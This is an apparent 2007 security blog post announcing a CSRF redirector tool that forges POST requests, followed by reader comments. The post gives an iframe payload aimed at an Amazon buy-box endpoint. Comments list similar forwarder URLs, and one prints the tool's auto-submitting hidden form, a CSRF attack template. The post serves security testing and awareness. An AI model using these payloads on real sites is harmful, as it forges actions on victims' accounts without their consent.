About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


CSRF Redirector

Inspired by the XSS POST Forwarder, I just created the CSRF Redirector. It's a simple tool that makes it easy to test CSRF using POST, hopefully demonstrating how prevalent CSRF vulnerabilities are as well as reducing the misconception that forging a POST request is complicated.

To use it, construct a URL of the form http://shiflett.org/csrf.php?csrf=URL&NAME=VALUE, where URL is the (URL-encoded) target site, and NAME and VALUE represent a name-value pair, of which there can be zero or more.

For example, the following IFrame exploits the Amazon vulnerability:

<iframe src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />

I may add more features at some point. Until then, enjoy!

About this post

CSRF Redirector was posted on Tue, 17 Jul 2007. If you liked it, follow me on Twitter or share:

17 comments

1.Drew Hintz said:

CSRF redirectors are useful. I have one that I've been using internally that strips out the HTTP referrer header using the javascript: null referrer technique. I've run in to a handful of sites check the referrer but are still vulnerable CSRF using a null referrer.

Eventually I'll post a link to it on my blog... http://int2e.com/blog/

Wed, 18 Jul 2007 at 05:41:57 GMT Link


2.Sid said:

Nice idea but I've already seen people using tinyurl for this purpose. Of course the only difference is that people can tell tinyurl to always preview links in which case that won't work.

Wed, 18 Jul 2007 at 07:37:44 GMT Link


3.Sid said:

Sorry, it seems I can't read (just woke up). Of course tinyurl isn't being used for those POST CSRFs, just the GET ones. I have to say though, I fail to see how your script differs from my XSS POST forwarder script except that submission is automated in this one.

Mine could be used for CSRF (if it was automated) and yours can be used for XSS, so we made the same thing didn't we?

Oh btw ;p

Wed, 18 Jul 2007 at 07:46:22 GMT Link


4.Chris Shiflett said:

I fail to see how your script differs from my XSS POST forwarder script except that submission is automated in this one.

The automation is important for CSRF. In addition, it hides the response to the POST request, making the attack easier to conceal in various contexts.

And thanks for the bug report. :-)

Wed, 18 Jul 2007 at 13:59:27 GMT Link


5.Drew Hintz said:

Neat, looks like the CSRF redirector works. ;)

However I can't think of a way to make link indefinitely replicate itself.

Wed, 18 Jul 2007 at 17:20:24 GMT Link


6.Chris Shiflett said:

Yes, it works. :-)

I first disclosed the fact that my comments form is vulnerable to CSRF about a year and a half ago:

http://shiflett.org/blog/2006/mar/p...ch-2006-edition

Surprisingly, no one has exploited the vulnerability, despite the fact that there have been a countless number of XSS attempts.

Now that people can log in, I should address the vulnerability, but it's interesting to note that it hasn't been exploited until now. By contrast, the XSS vulnerability in the redirector was discovered (and fixed) within a few hours.

Wed, 18 Jul 2007 at 17:48:09 GMT Link


7.Chris Shiflett said:

Actually, to be clear, the CSRF vulnerability was exploited in the post where I mentioned it, but it hasn't been exploited since.

You might be wondering why I find this interesting or why I have honeypots on my site. The reason is that I want to be able to get a feel for the popularity (or lack thereof) of CSRF. I suspect the number of people actively trying to discover CSRF vulnerabilities is much smaller than the number of people actively trying to discover XSS vulnerabilities, and as soon as this is no longer true, CSRF is going to be a much bigger problem.

Wed, 18 Jul 2007 at 18:10:07 GMT Link


8.pdp said:

hi Chris,

we have a CSRF forwarder script as well located at: http://www.gnucitizen.org/util/csrf

it is quite tiny and flexible... there are plans to add features to hide the refer as well.

this is how I use it for GET:

http://www.gnucitizen.org/util/csrf?_method=GET&_url=http%3A//www.google.com/search&q=test

and this is for POST:

http://www.gnucitizen.org/util/csrf?_url=http%3A//www.google.com/search&q=test

http://www.gnucitizen.org/util/csrf?_method=POST&_url=http%3A//www.google.com/search&q=test

quite simple

Fri, 20 Jul 2007 at 14:28:59 GMT Link


9.killerguppy said:

Great little tool. I'm testing it on several vuln scripts i wrote awhile ago for a demo.

Is there anyway you could post the source code? I hate using tools if I have no idea how they work. Also, I'm interested to see if/how you got around cookie/session authentication. Every time I tried to make a tool like this, linking the vulnerable form to the victim user was always a huge problem that I couldn't get past without some XSS or a sessionid in the url....

Sun, 22 Jul 2007 at 17:14:14 GMT Link


10.q said:

Nice tool.

ps, i was the young college student at OSCON asking you a lot of questions after you got done with "Security 2.0"

Fri, 10 Aug 2007 at 00:04:32 GMT Link


11.q said:

oh by the way, the guy that was in the room before you at OSCON said some stuff in his session that was wrong. He said that if you make a form use POST it will be protected from CSRF. I didn't want to say anything because like 2 seconds before he said this he asked how many people had heard of CSRF and like 2 people raised their hands including me. I don't think anyone would've taken me seriously, being a 17-year-old and looking like one. Besides, I don't like being at the center of attention. I also hate arguing. Maybe i should've said something.

Fri, 10 Aug 2007 at 07:33:57 GMT Link


12.Replyer said:

q said: Maybe i should've said something.

Sometimes you're better off saying nothing.

Sat, 11 Aug 2007 at 03:16:19 GMT Link


13.q said:

i posted about this on my new blog

http://qqq3468349856.blogspot.com/

Mon, 13 Aug 2007 at 04:35:01 GMT Link


14.Steve said:

There's a useful online tool for converting GET requests to POST requests at:

http://www.gettopost.com.

Just enter a URL and it will convert any GET parameters into a POST request and then submit the POST. It also excepts URLs tagged onto the base name e.g:

www.gettopost.com/gettopost.html?http://www.url.com?postparam1=value1

Also on the site is a useful bookmarklet for extracting the form parameter values that are filled in on all forms in any webpage. HTH, Steve

Sat, 16 Feb 2008 at 13:42:42 GMT Link


15.Alexander Gre said:

> I've run in to a handful of sites check the referrer but are still > vulnerable CSRF using a null referrer.

how it works? can i see the html/javascript-code?

Thu, 24 Apr 2008 at 21:14:35 GMT Link


16.MustLive said:

Chris.

As I wrote you by email, recently I have found one bug in your CSRF redirector.

When using char "[" (in ASCII or urlencoded) it is removing with the following symbols from query parameters (in body of your redirector).

http://shiflett.org/csrf.php?csrf=h...amp;name[i]=val

So I wish you to fix this bug (add normal support of "[" char) in your web application.

Tue, 09 Dec 2008 at 22:54:07 GMT Link


17.MustN'tLive said:

<html>

<head>

<title>Chris Shiflett: CSRF Redirector</title>

</head>

<body>

<iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe>

<form name="csrf" action="http://site" method="post" target="hidden">

<input type="hidden" name="name" value="<br />

<b>Warning</b>: htmlentities() expects parameter 1 to be string, array given in <b>/www/webroots/shiflett.org/www/csrf.php</b> on line <b>18</b><br />

" />

</form>

<script>document.csrf.submit();</script>

</body>

</html>

Sun, 30 Jan 2011 at 17:24:38 GMT Link


Hello! What’s your name?

Want to comment? Please connect with Twitter to join the discussion.